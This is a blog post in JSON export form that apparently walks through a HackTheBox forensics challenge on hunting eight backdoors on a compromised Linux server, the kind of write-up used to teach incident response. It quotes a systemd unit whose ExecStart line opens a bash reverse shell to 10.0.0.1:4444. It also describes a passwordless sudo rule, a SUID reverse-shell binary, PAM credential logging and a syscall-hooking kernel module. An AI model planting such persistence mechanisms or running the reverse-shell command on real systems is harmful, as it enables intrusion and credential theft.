{"id":134,"date":"2025-09-09T09:00:00","date_gmt":"2025-09-09T09:00:00","guid":{"rendered":"https:\/\/justruss.tech\/?p=134"},"modified":"2026-05-15T10:34:55","modified_gmt":"2026-05-15T10:34:55","slug":"persistenceisfutile","status":"publish","type":"post","link":"https:\/\/justruss.tech\/index.php\/2025\/09\/09\/persistenceisfutile\/","title":{"rendered":"PersistenceIsFutile | HTB Forensics (Moderate)"},"content":{"rendered":"

PersistenceIsFutile is a Moderate-difficulty HackTheBox forensics challenge. The scenario is a compromised Linux production server. The IR team found eight backdoors before going offline, documented nothing useful, and left you to clean the machine. No hints about what the backdoors are or where they are hiding.<\/p>\n

Methodology<\/h3>\n

Eight unknown backdoors on a Linux system requires systematic enumeration of persistence mechanisms rather than hunting for specific things. Start broad and work toward the subtle.<\/p>\n

The first four: obvious locations<\/h3>\n
# New user accounts\ngrep -v \"nologin\\|false\" \/etc\/passwd | grep -v \"^root\"\n# backdoor:x:1001:1001::\/home\/backdoor:\/bin\/bash\n\n# Cron jobs across all users\nfor user in $(cut -d: -f1 \/etc\/passwd); do crontab -u $user -l 2>\/dev\/null; done\ncat \/etc\/cron* \/var\/spool\/cron\/crontabs\/* 2>\/dev\/null\n# Entry running \/tmp\/.hidden\/update.sh every minute\n\n# SSH authorized_keys\nfind \/home \/root -name authorized_keys 2>\/dev\/null -exec cat {} \\;\n# Unexpected public key in \/root\/.ssh\/authorized_keys\n\n# Sudo rules\ncat \/etc\/sudoers \/etc\/sudoers.d\/*\n# www-data ALL=(ALL) NOPASSWD: ALL<\/pre>\n
The sudo rule giving www-data full root access with no password is particularly dangerous. Any webshell running as www-data has an instant root escalation path.<\/p>\n
The next four: less obvious<\/h3>\n
# SUID binaries in unexpected locations\nfind \/ -perm -4000 -type f 2>\/dev\/null | grep -v \"^\/usr\/bin\\|^\/usr\/sbin\\|^\/bin\\|^\/sbin\"\n# \/opt\/support\/updater  (opens a reverse shell when executed, runs as root via SUID)<\/pre>\n
# Systemd service units modified recently\nfind \/etc\/systemd \/usr\/lib\/systemd -name \"*.service\" -newer \/etc\/hostname 2>\/dev\/null\n# \/etc\/systemd\/system\/network-check.service\n\ncat \/etc\/systemd\/system\/network-check.service\n# ExecStart=\/bin\/bash -c 'bash -i >& \/dev\/tcp\/10.0.0.1\/4444 0>&1'<\/pre>\n
# PAM configuration\ngrep -r \"pam_exec\\|requisite\\|sufficient\" \/etc\/pam.d\/ | grep -v \"^#\"\n# Modified \/etc\/pam.d\/common-auth logging credentials to \/var\/log\/.syslog<\/pre>\n
# Kernel modules\nlsmod | awk '{print $1}' | while read mod; do\n    if ! modinfo $mod 2>\/dev\/null | grep -q \"^filename:\"; then\n        echo \"Suspicious: $mod\"\n    fi\ndone\n# netfilter_helper is loaded but not in any installed package<\/pre>\n
The kernel module was hooking the getdents syscall to hide its own files from directory listings. That is why the hidden cron script and hidden syslog file were not visible in simple ls output.<\/p>\n
Key takeaway<\/h3>\n
Persistence hunting on Linux is an enumeration problem. Comparing installed binaries against their package checksums and watching for recently modified files in system directories catches a lot of what manual inspection misses. The attackers who are hardest to find use modified legitimate files rather than new ones and names that closely resemble legitimate system components.<\/p>\n","protected":false},"excerpt":{"rendered":"
A walkthrough of PersistenceIsFutile on HackTheBox. Eight backdoors on a compromised Linux server with no documentation left behind. Systematic enumeration of persistence mechanisms from obvious to kernel-level.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-134","post","type-post","status-publish","format-standard","hentry","category-hackthebox"],"_links":{"self":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts\/134","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/comments?post=134"}],"version-history":[{"count":7,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts\/134\/revisions"}],"predecessor-version":[{"id":346,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts\/134\/revisions\/346"}],"wp:attachment":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/media?parent=134"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/categories?post=134"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/tags?post=134"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}